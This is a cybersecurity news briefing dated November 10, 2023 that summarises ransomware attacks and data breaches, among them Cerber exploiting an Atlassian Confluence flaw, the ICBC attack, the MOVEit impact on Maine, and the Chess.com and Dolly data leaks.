Cyware Daily Threat Intelligence
Daily Threat Briefing • Nov 10, 2023
This website uses cookies and similar technologies to provide essential functionality and improve your experience. Some features, such as demo scheduling and chat support, require marketing cookies to function. By clicking "Accept All", you consent to all cookies. Alternatively, you can customize your preferences, but note that declining marketing cookies will limit certain website features.
Daily Threat Briefing • Nov 10, 2023
More threat groups jump on the bandwagon to exploit the much controversial Atlassian Confluence Data Center and Server vulnerability. This time, it is Cerber ransomware. The attackers perform multi-stage attacks that could enable unauthorized users to create admin accounts with full privileges. On the brighter side of the evolving malicious landscape, a ransomware group has called off its operations, allegedly owing to increasing law enforcement pressure. It tried to sell its cybercrime infrastructure; Alas! no takers.
Meanwhile, a series of cyberattacks occurred in the past 24 hours, which crippled the systems of the world’s largest bank, a U.S. state government, and an American electronic components manufacturer. Security experts strongly attributed the attack on the bank to the LockBit group.
Data leaked on cybercrime forum
Dolly[.]com, a U.S.-based on-demand moving and delivery service, fell victim to a ransomware attack, compromising sensitive personal and financial data, such as credit card details. Despite reportedly paying the ransom, the cybercriminals deemed the amount insufficient, retaining both the money and the data. The attackers dumped the stolen data on a Russian-language cybercrime forum, including entry points for database instances. However, the downloadable files were later removed.
Online chess platform exploited
A threat actor leaked the scraped database of Chess[.]com, exposing personal data from 828,327 registered users on BreachForums. The compromised information includes full names, usernames, email addresses, profile links, originating countries, avatar URLs, UUIDs, and registration dates (with the latest sign-up in September). While the leaked data doesn't include passwords, the active and valid email addresses could be exploited for identity theft, phishing, or social engineering attacks.
MOVEit breach impacts Maine government
The Maine government confirmed that sensitive details of nearly 1.3 million residents were blurted out in the cyberattack involving the MOVEit file transfer system. Stolen data includes names, dates of birth, SSNs, driver's licenses, and, in some cases, medical and health insurance details. Maine’s Department of Health and Human Services and the Department of Education remained most affected among various other agencies. The MOVEit mass hack, fixed by Progress Software in May, has so far affected over 2,500 organizations globally.
ICBC's U.S. arm hit by ransomware attack
The U.S. arm of the Industrial and Commercial Bank of China (ICBC) experienced a ransomware attack disrupting trades in the U.S. Treasury market. ICBC Financial Services, the U.S. unit of China's largest commercial lender, is investigating the incident, with experts suggesting the LockBit cybercrime group is likely behind the incident. While LockBit's dark web site didn't mention ICBC as a victim, the attack signifies an escalation in ransomware groups targeting major financial institutions.
Electronic components manufacturer compromised
Kyocera AVX Components Corporation (KAVX), an American electronic components manufacturer, reported a cybersecurity breach on March 30th, which led to the encryption of parts of its systems and temporary disruption in services. The incident affected the personal information of 39,111 individuals globally, with servers in South Carolina compromised. Unauthorized access occurred between February 16th and March 30th, 2023.
Cerber abuses Atlassian Confluence bug
Trend Micro observed the Cerber ransomware exploiting a critical vulnerability, CVE-2023-22518, in the Atlassian Confluence Data Center and Server. The flaw was initially thought to cause data loss but was later revealed to allow unauthorized users to reset and create administrator accounts with full privileges. In this attack, Cerber executes a multi-step attack involving encoded PowerShell commands, connecting to a C2 server, downloading a malicious text file, and ultimately encrypting files on the compromised system. A PoC for the same was publicly leaked on November 2, 2023.
Ransomed.vc no more!
Ransomware gang Ransomed.vc, known for attacks on Sony, a Hawaii state government website, and a supplier to Colonial Pipeline, claims to shut down after six affiliates were allegedly arrested. The group initially emerged in August, threatening victims with European data breach fines. The hacker behind Ransomed.vc reportedly offered to sell the entire operation for around $10 million. In deleted Telegram messages, the individual cited the arrests as the reason for shutting down, expressing concern for the affiliates' lives.